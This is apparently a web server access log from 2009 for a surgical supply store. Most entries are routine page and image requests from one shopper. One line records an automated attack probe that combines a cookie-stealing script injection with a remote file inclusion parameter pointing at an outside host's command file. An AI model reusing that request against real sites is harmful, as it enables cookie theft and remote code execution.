74.58.86.139 - - [07/May/2009:23:07:59 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64808 "http://www.acesurgical.com/trufix_details.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:14 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:14 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:14 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:14 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:14 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:14 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:14 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:14 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:15 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:15 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:15 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:15 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:15 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:15 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:24 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:24 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:24 -0400] "GET /images/items/45419001_THUMB.JPG HTTP/1.1" 200 14901 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:24 -0400] "GET /images/items/45418015_THUMB.JPG HTTP/1.1" 200 16032 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:25 -0400] "GET /images/items/45417901_THUMB.JPG HTTP/1.1" 200 14987 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:25 -0400] "GET /images/items/45415001_THUMB.JPG HTTP/1.1" 200 14884 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:25 -0400] "GET /images/items/45415201_THUMB.JPG HTTP/1.1" 200 14626 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:25 -0400] "GET /images/items/TRUSCREWS_THUMB.JPG HTTP/1.1" 200 15579 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:25 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:25 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:26 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:26 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:26 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:26 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:26 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:27 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:27 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:27 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:27 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:27 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:27 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:43 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L108595477600F700AF2C01O+WSEQ(S0060):1+OUITEM(A0200):45418015 HTTP/1.1" 200 27013 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:45 -0400] "GET /images/items/45418015_FULL.JPG HTTP/1.1" 200 16075 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L108595477600F700AF2C01O+WSEQ(S0060):1+OUITEM(A0200):45418015" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:50 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:50 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:50 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:08:50 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:00 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
69.89.31.105 - - [07/May/2009:23:09:02 -0400] "GET /logs/access_log.Q108083100//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.812"
74.58.86.139 - - [07/May/2009:23:09:24 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76103 "http://www.acesurgical.com/glustitch.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:27 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:27 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:27 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:27 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:27 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:27 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:27 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:28 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:28 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:28 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:28 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:28 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:28 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:30 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:30 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:30 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:30 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:30 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:30 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:30 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:30 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:30 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:33 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:40 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:52 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1095954571803100F91C04G+M37+ENG HTTP/1.1" 200 63204 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
74.58.86.139 - - [07/May/2009:23:09:53 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095954571803100F91C04G+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 2.0.50727; MS-RTC LM 8)"
